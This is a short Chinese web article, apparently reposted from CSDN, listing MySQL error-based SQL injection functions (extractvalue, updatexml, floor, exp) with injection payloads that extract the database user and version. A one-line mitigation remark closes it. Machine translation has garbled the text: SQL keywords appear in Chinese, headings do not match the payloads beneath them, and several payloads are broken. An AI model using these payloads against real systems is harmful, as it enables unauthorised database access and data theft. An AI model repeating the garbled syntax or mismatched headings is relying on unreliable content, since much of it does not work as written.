目录
1. 报错和常用函数插入
提取值()函数
updatexml() 函数
楼层()函数
指数()
转变()
name_const()
2. 如何防止错误注入
一、报错注入常见的函数
extarctvalue()函数
id=1 and (extractvalue(1, concat(0x5c,(select user()))));
id=1 和(updatexml(0x3a,concat(1,(选择用户())),1));
updatexml()函数
id=1 和((选择计数(*),concat(版本(),地板) (rand (0)*2))x from information_schema.tables group by x)a)
floor()函数
id=1 and EXP(~(SELECT * from(select user())a)); 1010
exp()
避免使用导致错误注入的函数。过滤用户输入并添加防火墙。
#以上有关错误插入的相关内容来自网络,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91296.html
